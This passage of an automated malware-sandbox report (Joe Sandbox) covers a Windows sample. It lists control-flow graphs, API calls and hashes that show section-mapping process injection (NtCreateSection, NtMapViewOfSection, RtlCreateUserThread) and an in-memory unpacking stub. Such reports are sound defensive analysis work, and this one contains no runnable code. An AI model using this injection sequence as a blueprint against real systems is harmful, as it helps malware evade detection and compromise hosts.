      • Not Executed
      control_flow_graph 85 401553-4015b2 call 4011cd 97 4015b4 85->97 98 4015b7-4015bc 85->98 97->98 100 4015c2-4015d3 98->100 101 4018df-4018e7 98->101 104 4015d9-401602 100->104 105 4018dd 100->105 101->98 106 4018ec-40193b call 4011cd 101->106 104->105 114 401608-40161f NtDuplicateObject 104->114 105->106 114->105 116 401625-401649 NtCreateSection 114->116 118 4016a5-4016cb NtCreateSection 116->118 119 40164b-40166c NtMapViewOfSection 116->119 118->105 120 4016d1-4016d5 118->120 119->118 122 40166e-40168a NtMapViewOfSection 119->122 120->105 123 4016db-4016fc NtMapViewOfSection 120->123 122->118 125 40168c-4016a2 122->125 123->105 126 401702-40171e NtMapViewOfSection 123->126 125->118 126->105 128 401724 126->128 128->105 131 401724 call 401729 128->131 131->105
      APIs
      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
      Memory Dump Source
      • Source File: 00000000.00000002.2263997675.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_vwaoMjcyAw.jbxd
      Similarity
      • API ID: Section$View$Create$DuplicateObject
      • String ID:
      • API String ID: 1546783058-0
      • Opcode ID: 6d46c8a6fce290316f39b6869c298df5b0ebc69594c79ab5c6b7b5b864eca8fa
      • Instruction ID: ffaca3094f7e189a6d1e876f152d3a102a579446f97b5118db7f8e4db1241ca1
      • Opcode Fuzzy Hash: 6d46c8a6fce290316f39b6869c298df5b0ebc69594c79ab5c6b7b5b864eca8fa
      • Instruction Fuzzy Hash: FB613075A00204FBEB209F91CC49FAF7BB8EF85700F10412AF912BA1E5D7759941DB66
      Function 0040156B Relevance: 10.7, APIs: 7, Instructions: 176nativeCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 132 40156b-4015b2 call 4011cd 144 4015b4 132->144 145 4015b7-4015bc 132->145 144->145 147 4015c2-4015d3 145->147 148 4018df-4018e7 145->148 151 4015d9-401602 147->151 152 4018dd 147->152 148->145 153 4018ec-40193b call 4011cd 148->153 151->152 161 401608-40161f NtDuplicateObject 151->161 152->153 161->152 163 401625-401649 NtCreateSection 161->163 165 4016a5-4016cb NtCreateSection 163->165 166 40164b-40166c NtMapViewOfSection 163->166 165->152 167 4016d1-4016d5 165->167 166->165 169 40166e-40168a NtMapViewOfSection 166->169 167->152 170 4016db-4016fc NtMapViewOfSection 167->170 169->165 172 40168c-4016a2 169->172 170->152 173 401702-40171e NtMapViewOfSection 170->173 172->165 173->152 175 401724 173->175 175->152 178 401724 call 401729 175->178 178->152
      APIs
      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
      Memory Dump Source
      • Source File: 00000000.00000002.2263997675.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_vwaoMjcyAw.jbxd
      Similarity
      • API ID: Section$View$Create$DuplicateObject
      • String ID:
      • API String ID: 1546783058-0
      • Opcode ID: d3862df6149cc6d9473f3846e0a5cef4746480e6edce1058660ec2639c81cc0b
      • Instruction ID: bfc0b8c1e1aad88884ae744cc722ee3a04b4b25e2f03b0569bf5ee1b63965b96
      • Opcode Fuzzy Hash: d3862df6149cc6d9473f3846e0a5cef4746480e6edce1058660ec2639c81cc0b
      • Instruction Fuzzy Hash: 34512B75900205BBEB209F91CC49FAF7BB8FF85B00F14412AF912BA2E5D7759941CB25
      Function 00401561 Relevance: 10.7, APIs: 7, Instructions: 175nativeCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 179 401561-4015b2 call 4011cd 189 4015b4 179->189 190 4015b7-4015bc 179->190 189->190 192 4015c2-4015d3 190->192 193 4018df-4018e7 190->193 196 4015d9-401602 192->196 197 4018dd 192->197 193->190 198 4018ec-40193b call 4011cd 193->198 196->197 206 401608-40161f NtDuplicateObject 196->206 197->198 206->197 208 401625-401649 NtCreateSection 206->208 210 4016a5-4016cb NtCreateSection 208->210 211 40164b-40166c NtMapViewOfSection 208->211 210->197 212 4016d1-4016d5 210->212 211->210 214 40166e-40168a NtMapViewOfSection 211->214 212->197 215 4016db-4016fc NtMapViewOfSection 212->215 214->210 217 40168c-4016a2 214->217 215->197 218 401702-40171e NtMapViewOfSection 215->218 217->210 218->197 220 401724 218->220 220->197 223 401724 call 401729 220->223 223->197
      APIs
      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
      Memory Dump Source
      • Source File: 00000000.00000002.2263997675.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_vwaoMjcyAw.jbxd
      Similarity
      • API ID: Section$View$Create$DuplicateObject
      • String ID:
      • API String ID: 1546783058-0
      • Opcode ID: c037a065b71caf94a0fa6c09a6d83b4137dfe21335f97c9ee716951ac1d37583
      • Instruction ID: 412e9309e7daddaa9b19f32dddfbffbd79934f2f1d3bc440b9a7152e2b53a84f
      • Opcode Fuzzy Hash: c037a065b71caf94a0fa6c09a6d83b4137dfe21335f97c9ee716951ac1d37583
      • Instruction Fuzzy Hash: 235119B1900205BFEB209F91CC49FAF7BB8EF85B00F14412AF912BA2E5D7759941CB25
      Function 0040156F Relevance: 10.7, APIs: 7, Instructions: 172nativeCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 224 40156f-4015b2 call 4011cd 232 4015b4 224->232 233 4015b7-4015bc 224->233 232->233 235 4015c2-4015d3 233->235 236 4018df-4018e7 233->236 239 4015d9-401602 235->239 240 4018dd 235->240 236->233 241 4018ec-40193b call 4011cd 236->241 239->240 249 401608-40161f NtDuplicateObject 239->249 240->241 249->240 251 401625-401649 NtCreateSection 249->251 253 4016a5-4016cb NtCreateSection 251->253 254 40164b-40166c NtMapViewOfSection 251->254 253->240 255 4016d1-4016d5 253->255 254->253 257 40166e-40168a NtMapViewOfSection 254->257 255->240 258 4016db-4016fc NtMapViewOfSection 255->258 257->253 260 40168c-4016a2 257->260 258->240 261 401702-40171e NtMapViewOfSection 258->261 260->253 261->240 263 401724 261->263 263->240 266 401724 call 401729 263->266 266->240
      APIs
      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
      Memory Dump Source
      • Source File: 00000000.00000002.2263997675.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_vwaoMjcyAw.jbxd
      Similarity
      • API ID: Section$View$Create$DuplicateObject
      • String ID:
      • API String ID: 1546783058-0
      • Opcode ID: b43ab6a5ae3b26584acf886c72f61fec6545de2c9739d40d58a61617a66ea401
      • Instruction ID: 5723072b253cbae10e330d7def6e8ce5ab34414c0c11206194204dab9df800f9
      • Opcode Fuzzy Hash: b43ab6a5ae3b26584acf886c72f61fec6545de2c9739d40d58a61617a66ea401
      • Instruction Fuzzy Hash: 6A5109B1900205BBEB209F91CC49FAF7BB8EF85B00F144129FA11BA2E5D6759945CB24
      Function 00401583 Relevance: 10.7, APIs: 7, Instructions: 171nativeCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 267 401583-4015b2 call 4011cd 276 4015b4 267->276 277 4015b7-4015bc 267->277 276->277 279 4015c2-4015d3 277->279 280 4018df-4018e7 277->280 283 4015d9-401602 279->283 284 4018dd 279->284 280->277 285 4018ec-40193b call 4011cd 280->285 283->284 293 401608-40161f NtDuplicateObject 283->293 284->285 293->284 295 401625-401649 NtCreateSection 293->295 297 4016a5-4016cb NtCreateSection 295->297 298 40164b-40166c NtMapViewOfSection 295->298 297->284 299 4016d1-4016d5 297->299 298->297 301 40166e-40168a NtMapViewOfSection 298->301 299->284 302 4016db-4016fc NtMapViewOfSection 299->302 301->297 304 40168c-4016a2 301->304 302->284 305 401702-40171e NtMapViewOfSection 302->305 304->297 305->284 307 401724 305->307 307->284 310 401724 call 401729 307->310 310->284
      APIs
      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
      Memory Dump Source
      • Source File: 00000000.00000002.2263997675.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_vwaoMjcyAw.jbxd
      Similarity
      • API ID: Section$View$Create$DuplicateObject
      • String ID:
      • API String ID: 1546783058-0
      • Opcode ID: 1e91f4c09bcacef1392eeaa703420aa8b20b57299c6afd06cd755880f7f169b4
      • Instruction ID: be4f3395432beacb56dc40f225edc855b7308e08cbc6b66c5e1fe0de6445bc19
      • Opcode Fuzzy Hash: 1e91f4c09bcacef1392eeaa703420aa8b20b57299c6afd06cd755880f7f169b4
      • Instruction Fuzzy Hash: D6510BB1900205BBEB209F91CC49FAF7BB8EF85B00F14412AFA11BA2E5D7759945CB64
      Function 00401587 Relevance: 10.7, APIs: 7, Instructions: 166nativeCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 311 401587-4015b2 call 4011cd 315 4015b4 311->315 316 4015b7-4015bc 311->316 315->316 318 4015c2-4015d3 316->318 319 4018df-4018e7 316->319 322 4015d9-401602 318->322 323 4018dd 318->323 319->316 324 4018ec-40193b call 4011cd 319->324 322->323 332 401608-40161f NtDuplicateObject 322->332 323->324 332->323 334 401625-401649 NtCreateSection 332->334 336 4016a5-4016cb NtCreateSection 334->336 337 40164b-40166c NtMapViewOfSection 334->337 336->323 338 4016d1-4016d5 336->338 337->336 340 40166e-40168a NtMapViewOfSection 337->340 338->323 341 4016db-4016fc NtMapViewOfSection 338->341 340->336 343 40168c-4016a2 340->343 341->323 344 401702-40171e NtMapViewOfSection 341->344 343->336 344->323 346 401724 344->346 346->323 349 401724 call 401729 346->349 349->323
      APIs
      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
      Memory Dump Source
      • Source File: 00000000.00000002.2263997675.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_vwaoMjcyAw.jbxd
      Similarity
      • API ID: Section$View$Create$DuplicateObject
      • String ID:
      • API String ID: 1546783058-0
      • Opcode ID: 17ba237f8dee9763ec0b09a09ce7a307427fbde3e710961389b3aebbe6aa507a
      • Instruction ID: c9324331886a871ff7b65cfc1a3adde32c11ca3f72b54674233341407885f4d3
      • Opcode Fuzzy Hash: 17ba237f8dee9763ec0b09a09ce7a307427fbde3e710961389b3aebbe6aa507a
      • Instruction Fuzzy Hash: 7E511A71900249BBEB209F91CC48FEF7BB8EF85B00F144169F911AA2E5D7759945CB24
      Function 00401729 Relevance: 4.7, APIs: 3, Instructions: 179nativeCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 350 401729 351 40172b 350->351 352 40172f-40174d 350->352 351->352 353 40172d 351->353 363 401764 352->363 364 401755-401778 352->364 353->352 355 4016be-4016cb NtCreateSection 353->355 357 4016d1-4016d5 355->357 358 4018dd-40193b call 4011cd 355->358 357->358 360 4016db-4016fc NtMapViewOfSection 357->360 360->358 365 401702-40171e NtMapViewOfSection 360->365 363->364 376 40177b-4017b8 364->376 365->358 367 401724 365->367 367->358 370 401724 call 401729 367->370 370->358 392 4017ba-4017e3 376->392 397 4017e5-4017eb 392->397 398 4017ed 392->398 399 4017f3-4017f9 397->399 398->399 400 401809-40180d 399->400 401 4017fb-401807 399->401 400->399 402 40180f-401814 400->402 401->400 403 401816 call 40181b 402->403 404 40187c-40188b 402->404 405 40188e-401891 404->405 407 401893-40189d 405->407 408 4018bb-4018d4 405->408 409 4018a0-4018a9 407->409 408->358 410 4018b7 409->410 411 4018ab-4018b5 409->411 410->409 412 4018b9 410->412 411->410 412->405
      APIs
      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
      Memory Dump Source
      • Source File: 00000000.00000002.2263997675.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_vwaoMjcyAw.jbxd
      Similarity
      • API ID: Section$View$Create
      • String ID:
      • API String ID: 33071139-0
      • Opcode ID: d7ffac209591ce09f7b22c4e86819d2404e8050f733b4d1493b8ea105d7330e7
      • Instruction ID: bb29a515743844fa426f6922f48e3936f90c9c278b9ffb8c9c9d974ad6050a99
      • Opcode Fuzzy Hash: d7ffac209591ce09f7b22c4e86819d2404e8050f733b4d1493b8ea105d7330e7
      • Instruction Fuzzy Hash: 69519272904104EBEB249A55CC44FAA77B5FF85700F24813BE842772F0D67C6942E65B
      Function 00403005 Relevance: 3.2, APIs: 2, Instructions: 168nativethreadCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 413 403005-403029 414 40315c-403161 413->414 415 40302f-403047 413->415 415->414 416 40304d-40305e 415->416 417 403060-403069 416->417 418 40306e-40307c 417->418 418->418 419 40307e-403085 418->419 420 4030a7-4030ae 419->420 421 403087-4030a6 419->421 422 4030d0-4030d3 420->422 423 4030b0-4030cf 420->423 421->420 424 4030d5-4030d8 422->424 425 4030dc 422->425 423->422 424->425 427 4030da 424->427 425->417 426 4030de-4030e3 425->426 426->414 428 4030e5-4030e8 426->428 427->426 428->414 429 4030ea-403159 RtlCreateUserThread NtTerminateProcess 428->429 429->414
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2263997675.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_vwaoMjcyAw.jbxd
      Similarity
      • API ID: CreateProcessTerminateThreadUser
      • String ID:
      • API String ID: 1921587553-0
      • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
      • Instruction ID: 9349ae55c142a47270c9c73eabb89239111d3cd47c98212c67b606f4e0ccd907
      • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
      • Instruction Fuzzy Hash: C5412531218E088FD7A8EF6CA88576377D5F798311F6643AAE809D3389EA34DC5187C5
      Function 02D095D9 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 430 2d095d9-2d095f2 431 2d095f4-2d095f6 430->431 432 2d095f8 431->432 433 2d095fd-2d09609 CreateToolhelp32Snapshot 431->433 432->433 434 2d09619-2d09626 Module32First 433->434 435 2d0960b-2d09611 433->435 436 2d09628-2d09629 call 2d09298 434->436 437 2d0962f-2d09637 434->437 435->434 442 2d09613-2d09617 435->442 440 2d0962e 436->440 440->437 442->431 442->434
      APIs
      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02D09601
      • Module32First.KERNEL32(00000000,00000224), ref: 02D09621
      Memory Dump Source
      • Source File: 00000000.00000002.2270182856.0000000002D02000.00000040.00000020.00020000.00000000.sdmp, Offset: 02D02000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_2d02000_vwaoMjcyAw.jbxd
      Yara matches
      Similarity
      • API ID: CreateFirstModule32SnapshotToolhelp32
      • String ID:
      • API String ID: 3833638111-0
      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
      • Instruction ID: 2621f8ee4875ddfb2f2830e9944a9894e2242617f7cb69cf105f32edb44c8235
      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
      • Instruction Fuzzy Hash: 89F096311007156BE7203BF5A8DCBEE76FCEF49B28F540528E642925D1DB70EC458A61
      Function 02BB003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 0 2bb003c-2bb0047 1 2bb0049 0->1 2 2bb004c-2bb0263 call 2bb0a3f call 2bb0e0f call 2bb0d90 VirtualAlloc 0->2 1->2 17 2bb028b-2bb0292 2->17 18 2bb0265-2bb0289 call 2bb0a69 2->18 20 2bb02a1-2bb02b0 17->20 21 2bb02ce-2bb03c2 VirtualProtect call 2bb0cce call 2bb0ce7 18->21 20->21 22 2bb02b2-2bb02cc 20->22 29 2bb03d1-2bb03e0 21->29 22->20 30 2bb0439-2bb04b8 VirtualFree 29->30 31 2bb03e2-2bb0437 call 2bb0ce7 29->31 33 2bb04be-2bb04cd 30->33 34 2bb05f4-2bb05fe 30->34 31->29 38 2bb04d3-2bb04dd 33->38 35 2bb077f-2bb0789 34->35 36 2bb0604-2bb060d 34->36 42 2bb078b-2bb07a3 35->42 43 2bb07a6-2bb07b0 35->43 36->35 39 2bb0613-2bb0637 36->39 38->34 41 2bb04e3-2bb0505 38->41 46 2bb063e-2bb0648 39->46 50 2bb0517-2bb0520 41->50 51 2bb0507-2bb0515 41->51 42->43 44 2bb086e-2bb08be LoadLibraryA 43->44 45 2bb07b6-2bb07cb 43->45 55 2bb08c7-2bb08f9 44->55 48 2bb07d2-2bb07d5 45->48 46->35 49 2bb064e-2bb065a 46->49 52 2bb07d7-2bb07e0 48->52 53 2bb0824-2bb0833 48->53 49->35 54 2bb0660-2bb066a 49->54 58 2bb0526-2bb0547 50->58 51->58 59 2bb07e2 52->59 60 2bb07e4-2bb0822 52->60 62 2bb0839-2bb083c 53->62 61 2bb067a-2bb0689 54->61 56 2bb08fb-2bb0901 55->56 57 2bb0902-2bb091d 55->57 56->57 63 2bb054d-2bb0550 58->63 59->53 60->48 64 2bb068f-2bb06b2 61->64 65 2bb0750-2bb077a 61->65 62->44 66 2bb083e-2bb0847 62->66 68 2bb05e0-2bb05ef 63->68 69 2bb0556-2bb056b 63->69 70 2bb06ef-2bb06fc 64->70 71 2bb06b4-2bb06ed 64->71 65->46 72 2bb084b-2bb086c 66->72 73 2bb0849 66->73 68->38 74 2bb056f-2bb057a 69->74 75 2bb056d 69->75 76 2bb074b 70->76 77 2bb06fe-2bb0748 70->77 71->70 72->62 73->44 78 2bb059b-2bb05bb 74->78 79 2bb057c-2bb0599 74->79 75->68 76->61 77->76 84 2bb05bd-2bb05db 78->84 79->84 84->63
      APIs
      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02BB024D
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2269300413.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_2bb0000_vwaoMjcyAw.jbxd
      Yara matches
      Similarity
      • API ID: AllocVirtual
      • String ID: cess$kernel32.dll
      • API String ID: 4275171209-1230238691
      • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
      • Instruction ID: c90a2213fb2bd0054ee305e824e992234aa60f2696ebabc1bc8932e0190e7174
      • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
      • Instruction Fuzzy Hash: 95527974A00229DFDB65CF68C984BADBBB1BF09304F1484D9E94DAB351DB70AA84CF14
      Function 02BB0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 443 2bb0e0f-2bb0e24 SetErrorMode * 2 444 2bb0e2b-2bb0e2c 443->444 445 2bb0e26 443->445 445->444
      APIs
      • SetErrorMode.KERNELBASE(00000400,?,?,02BB0223,?,?), ref: 02BB0E19
      • SetErrorMode.KERNELBASE(00000000,?,?,02BB0223,?,?), ref: 02BB0E1E
      Memory Dump Source
      • Source File: 00000000.00000002.2269300413.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_2bb0000_vwaoMjcyAw.jbxd
      Yara matches
      Similarity
      • API ID: ErrorMode
      • String ID:
      • API String ID: 2340568224-0
      • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
      • Instruction ID: 43804a22a99cfa038d1b1c2ebaa3f3077fc4812c5441b61ad954bd67a4bff1f0
      • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
      • Instruction Fuzzy Hash: 01D0123554512877D7013A94DC09BDE7B1CDF09B66F008451FB0DD9080C7B0954046E5
      Function 0040193E Relevance: 1.3, APIs: 1, Instructions: 63sleepCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 446 40193e-401947 447 40195e 446->447 448 40194f-40195a 446->448 447->448 449 401961-4019ae call 4011cd Sleep call 401452 447->449 448->449 460 4019b0-4019b8 call 401553 449->460 461 4019bd-401a03 call 4011cd 449->461 460->461
      APIs
      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
      Memory Dump Source
      • Source File: 00000000.00000002.2263997675.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_vwaoMjcyAw.jbxd
      Similarity
      • API ID: CreateDuplicateObjectSectionSleep
      • String ID:
      • API String ID: 4152845823-0
      • Opcode ID: 63c6d220c0b2465f65230560b632e8fee6ee77bde0997471010d6e0ffaa45abb
      • Instruction ID: 4db8ba0b08380255fc5aa34ea3e13561f838480f888933e927f1079a64c57490
      • Opcode Fuzzy Hash: 63c6d220c0b2465f65230560b632e8fee6ee77bde0997471010d6e0ffaa45abb
      • Instruction Fuzzy Hash: 9A11CEF120C208FBEB006A959D62E7A3268AB40714F304137BA43790F1D57E8923F76B
      Function 0040194A Relevance: 1.3, APIs: 1, Instructions: 57sleepCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 475 40194a-4019ae call 4011cd Sleep call 401452 488 4019b0-4019b8 call 401553 475->488 489 4019bd-401a03 call 4011cd 475->489 488->489
      APIs
      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
      Memory Dump Source
      • Source File: 00000000.00000002.2263997675.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_vwaoMjcyAw.jbxd
      Similarity
      • API ID: CreateDuplicateObjectSectionSleep
      • String ID:
      • API String ID: 4152845823-0
      • Opcode ID: 5da34bb6d812b8abf119b9d3fe0d5b8ad3457d6c21a2f33bdd5f198c88081420
      • Instruction ID: 0371ecd990254dd767a604aa567081474727263e4e3774a05daf7e54a603023c
      • Opcode Fuzzy Hash: 5da34bb6d812b8abf119b9d3fe0d5b8ad3457d6c21a2f33bdd5f198c88081420
      • Instruction Fuzzy Hash: A901A1B120C204EBDB009A95DD62E7A3364AB40314F30453BBA437A1F1C67D9913E72B
      Function 0040195C Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON
      Download Yara Rule

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 503 40195c-4019ae call 4011cd Sleep call 401452 515 4019b0-4019b8 call 401553 503->515 516 4019bd-401a03 call 4011cd 503->516 515->516
      APIs
      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
      Memory Dump Source
      • Source File: 00000000.00000002.2263997675.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_vwaoMjcyAw.jbxd
      Similarity
      • API ID: CreateDuplicateObjectSectionSleep
      • String ID:
      • API String ID: 4152845823-0
      • Opcode ID: 92877e8f189ce066243e493096c58f6ac8e61300460a3c45de21f975e55ffa31
      • Instruction ID: 3b2e7dc224df146109f963d95c0ead7a9e1b698bafe8296883a7ac19869aede1
